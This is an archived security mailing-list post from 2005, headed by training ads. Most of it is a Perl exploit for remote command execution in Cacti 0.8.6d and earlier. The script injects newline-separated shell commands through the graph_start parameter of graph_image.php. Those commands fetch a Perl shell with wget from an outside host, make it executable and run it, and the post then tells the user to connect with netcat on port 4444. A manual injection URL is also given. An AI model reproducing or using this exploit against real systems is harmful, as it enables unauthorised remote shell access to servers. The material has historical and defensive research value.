Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Remote Command Execution Exploit for Cacti <= 0.8.6d

from [Alberto Trivero] Network Security [Permanent Link]
Subject: Remote Command Execution Exploit for Cacti <= 0.8.6d
Date: Wed, 22 Jun 2005 19:53:53 +0200 
#!/usr/bin/perl
#
# Remote Command Execution Exploit for Cacti <= 0.8.6d
#
# This exploit open a remote shell on the targets that uses Cacti
# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:
# manual exploiting -->
http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&gr
aph_start=%0a[command]%0a
# Patch: download the last version http://www.cacti.net/download_cacti.php
# Discovered and Coded by Alberto Trivero

use LWP::Simple;

print "\n\t===============================\n";
print "\t= Exploit for Cacti <= 0.8.6d =\n";
print "\t=      by Alberto Trivero     =\n";
print "\t===============================\n\n";

if(@ARGV<2 or !($ARGV[1]=~m/\//)) {
   print "Usage:\nperl $0 [target] [path]\n\nExamples:\nperl $0
www.example.com /cacti/\n";
   exit(0);
}

$page=get("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=list";) || die
"[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/local_graph_id=(.*?)&/ || die "[-] Unable to retrieve a value for
local_graph_id";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=$1&graph_sta
rt=%0acd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777
shell.pl;perl shell.pl%0a");
print "[+] Exploiting request done!\n";
print "[*] Now try on your box: nc -v $ARGV[0] 4444\n";

Attachment: cacti.pl
Description: Binary data

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Remote Command Execution Exploit for Cacti <= 0.8.6d, Alberto Trivero <=
Previous by Date:  Weaknesses in WLAN Session Containment, Joshua Wright
Next by Date:  Local Root exploit (Fedora Core 4), Florian Strankowski (fs)
Previous by Thread:  Weaknesses in WLAN Session Containment, Joshua Wright
Next by Thread:  Local Root exploit (Fedora Core 4), Florian Strankowski (fs)
Indexes:  [Date] [Thread] [Top] [All Lists]